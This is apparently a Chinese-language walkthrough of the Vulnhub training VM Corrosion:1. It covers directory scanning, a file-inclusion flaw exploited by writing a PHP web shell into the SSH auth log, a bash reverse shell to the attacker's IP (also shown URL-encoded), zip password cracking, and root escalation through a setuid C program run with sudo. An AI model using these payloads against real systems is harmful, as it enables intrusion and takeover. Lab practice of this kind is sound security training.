看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1

Vulnhub靶机介绍：

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机，老样子需要找到flag即可。

Difficulty: Easy

Vulnhub靶机下载：

官网下载：https://download.vulnhub.com/corrosion/Corrosion.ova

Vulnhub靶机安装：

下载好了把安装包解压 然后使用VMware打开即可。

Vulnhub靶机漏洞详解：

①：信息收集：

kali里使用arp-scan -l或者netdiscover发现主机

使用命令：nmap -sS -sV -T4 -n -p- 192.168.0.103

渗透机：kali IP ：192.168.0.104 靶机IP ：192.168.0.103

发现开启了80和22端口，老样子访问80端口（Apache默认页面）进行扫描：dirb、dirsearch、whatweb、gobuster等

这里扫到一个/tasks目录进行访问 提示我们： 然后接着使用dirsearch或者gobuster扫扫到了/blog-post然后进行访问

1. 更改授权日志的权限
2. 更改端口 22 -> 7672

1. 设置phpMyAdmin

gobuster dir -u http://192.168.0.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
whatweb 192.168.0.103
dirsearch -u http://192.168.0.103 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

②：漏洞发现：

发现没有可以利用的信息，继续进行信息收集尝试对二级目录进行扫描gobuster扫到了一个/archives进行访问

gobuster dir -u http://192.168.0.103/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip 

这里什么也没但是感觉有点像文件包含源代码也没东西 空白的ffuf 模糊探测一下 得到参数 file然后进行文件包含

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.0.103/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0

③：文件包含渗透（ssh日志写木马）：

ssh '<?php system($_REQUEST['cmd']);?>'@192.168.0.103
view-source:http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig #查看发现执行成功！

④：反弹Shell：

nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.0.104/4444 0>&1" | bash  #需要url编码
http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash #这里需要url编码

⑤：gcc编译文件提权：

得到shell 先看一下权限发现是一个低权限www-data 所以需要提权

sudo -l 看看有没有可以执行sudo的文件也没有 隐藏文件有个randylogs.php

又在/var目录下发现backups文件，可能是备份文件

要想访问靶机里面的文件需要用python开启一个临时网页服务：python3 -m http.server 8000下载user_backup.zip发现需要密码

这里使用zip2john user_backup.zip > passwd.txt 把密码文件导入passwd文件使用john进行破解 这里要使用字典

不加字典的话结束进程会报错，这里出来个 /root/.john/john.rec 类似于进程重复了删掉就好了使用 rm -rf /root/.john/john.rec命令

在使用字典爆破就可以了使用rockyou这个字典，也可以使用fcrackzip进行爆破 得到密码：!randybaby

这里我们知道了账号密码 尝试登入randy 发现登入成功！！！

基本信息收集一下 id，whoami，sudo -l

这里sudo -l 发现/tools/easysysinfo可以免密执行命令进去cat 一下在运行一下 然后刚刚上面有个c文件 which查看有没有gcc

有的话可以编译 新建一个eastsysinfo.c内容见代码块，然后gcc 编译 sudo运行编译好的文件即可。

#include "unistd.h"
#include "stdlib.h"
void main()
{
        setuid(0);
        setgid(0);
        system("bash -i");
}

⑥：获取FLAG：

至此至此获取到了flag，本篇文章渗透结束 感谢大家的观看！！

Vulnhub靶机渗透总结：

这个靶机难度中偏上 因为比较麻烦

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具：nikto，dirb，dirbuster，whatweb，ffuf等 查看F12源码信息

2.文件包含漏洞，包含日志文件 ssh写入木马ssh '<?php system($_REQUEST['cmd']);?>'@靶机（新知识点！）

3.nc反弹shell（这里要使用url编码）zip2john爆破和fcrackzip（爆破压缩包工具）还有john报错解决方法（新知识点！）

4.python3 -m http.server 8000 开启临时http服务

5.gcc 编译文件提权 which查看系统有没有有用的命令用于提权

Corrosion系列靶机的第一个靶机，学习到了很多知识点又是收获满满的一天（耶耶耶！）

最后创作不易，希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐！！